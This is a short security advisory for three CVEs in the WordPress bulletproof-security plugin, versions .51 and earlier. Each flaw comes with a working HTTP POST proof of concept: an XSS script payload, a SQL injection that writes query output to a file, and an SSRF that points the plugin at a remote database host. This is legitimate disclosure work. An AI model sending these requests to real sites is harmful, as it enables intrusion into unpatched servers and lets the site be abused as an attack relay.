Vulnerability title: Wordpress bulletproof-security <=.51 multiple
vulnerabilities
Author: Pietro Oliva
CVE: CVE-2014-7958, CVE-2014-7959, CVE-2014-8749
Vendor: AITpro
Product: bulletproof-security
Affected version: bulletproof-security <= .51
Vulnerabilities fixed in version: .51.1
Details:
xss vulnerability (CVE-2014-7958):
POST /wp-content/plugins/bulletproof-security/admin/htaccess/bpsunlock.php
HTTP/1.1
dbname=&dbuser=&dbpassword=&dbhost=%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E&tableprefix=&username=&Login-Security-Unlock=Unlock+User+Account
SQL injection vulnerability (CVE-2014-7959, correct db username and
password is required in order to exploit this):
POST /wordpress/wp-content/plugins/bulletproof-security/admin/htaccess/bpsunlock.php
HTTP/1.1
dbname=information_schema&dbuser=root&dbpassword=password&dbhost=&tableprefix=tables+into+outfile+'/tmp/tables'%3b±-+&username=&Login-Security-Unlock=Unlock+User+Account
SSRF vulnerability (CVE-2014-8749)
POST /wp-content/plugins/bulletproof-security/admin/htaccess/bpsunlock.php
HTTP/1.1
dbname=&dbuser=root&dbpassword&dbhost=remotedatabase.com&tableprefix=&username=&Login-Security-Unlock=Unlock+User+Account
Possible scenario:
Extra step:
-If the sql injection flaw (CVE-2014-7959) is not fixed, an attacker
could also execute arbitrary sql statement on the remote server, as
the vulnerable page executes a query if the authentication is
successful (without filtering or use prepared statements). The source
of the attack would appear to be the bulletproof-security vulnerable
site.